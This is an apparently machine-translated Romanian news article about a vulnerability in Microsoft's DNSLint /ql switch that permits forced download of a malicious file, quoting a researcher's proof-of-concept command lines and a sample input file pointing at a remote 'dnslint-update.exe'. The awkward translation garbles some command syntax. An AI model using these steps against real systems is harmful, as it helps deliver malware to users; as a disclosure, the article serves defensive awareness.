Comutatorul QL al utilitarului DNSLint de la Microsoft ar putea permite descărcarea fișierelor la distanță

Securitate / Comutatorul QL al utilitarului DNSLint de la Microsoft ar putea permite descărcarea fișierelor la distanță 2 minute citite

Microsoft Corporation



Microsoft DNSLint utilitarul funcționează pentru a diagnostica problemele de căutare a numelui sistemului de nume de domeniu (DNS) legate de adresele IP alocate diferitelor servere web care sunt accesate printr-un browser. Nu este inclus ca parte a pachetului Windows de bază, dar poate fi descărcat gratuit de pe site-ul Microsoft. O vulnerabilitate la acces la distanță a notat 7.6 (critic) pe CVSS 3.0 Scala a fost descoperită pentru a afecta acest utilitar, provocând unitatea forțată de descărcări.

Vulnerabilitatea se ridică din faptul că DNSLint nu revizuiește numele de domeniu atunci când analizează fișierele de testare DNS conform comutatorului „/ ql”. În cazul în care un utilizator final reușește să utilizeze un astfel de fișier care conține script sau cod binar spre deosebire de informațiile tipic anticipate despre numele de domeniu, sistemul ar putea fi pus în pericol acolo unde devine ușor să instaleze descărcări forțate. În cazul în care se întâmplă acest lucru, un hacker ar putea să solicite descărcarea forțată a unui fișier rău intenționat care ar putea descărca și executa comenzi la distanță atunci când este accesat prin browserul web. Descărcarea ar salva într-o locație locală a sistemului și va solicita accesul de securitate și, văzând că fișierul provine dintr-o locație cunoscută de pe unitatea de disc, un utilizator ar putea fi înclinat să permită executabilului să continue. Odată ce fișierului rău intenționat i se acordă privilegiul, acesta poate rula de la distanță orice cod intenționat și poate compromite securitatea și confidențialitatea utilizatorului.



John Page din hyp3rlinx a scris o dovadă a conceptului care simulează această vulnerabilitate, explicând că un fișier neintenționat ar putea fi descărcat după cum urmează atunci când un script sau un fișier text de referință binar este folosit spre deosebire de numele domeniului:



dnslint.exe / v / y / d „MALWARE-FILE” / s X.X.X.X / r „raportul meu”



În contextul utilitarului DNSLint, următoarele arată cum vulnerabilitatea ar putea fi exploatată pentru a introduce malware în sistem.

1) „dnslint-update.exe” pe direcția rădăcină a serverului web la distanță.
2) „servers.txt”
DNSLint
; Acesta este un exemplu de fișier de intrare DNSLint
+ Acest server DNS se numește: dns1.cp.msft.net
[dns ~ server] X.X.X.X
, a, r; Un record
X.X.X.X, ptr, r; înregistrare PTR
test1, cname, r; înregistrare CNAME
test2, mx, r; înregistrare MX
3) dnslint.exe / ql servers.txt

Codul de mai sus nu a fost modificat așa cum este subliniat de drepturi de hyp3rlinx la acest conținut. Dezvăluind această vulnerabilitate, nu pare să existe nicio actualizare de patch-uri pentru a rezolva această problemă încă. Un cod CVE trebuie încă să fie atribuit acestei vulnerabilități și urmează să fie identificat și scris de Microsoft în buletinul său oficial de securitate.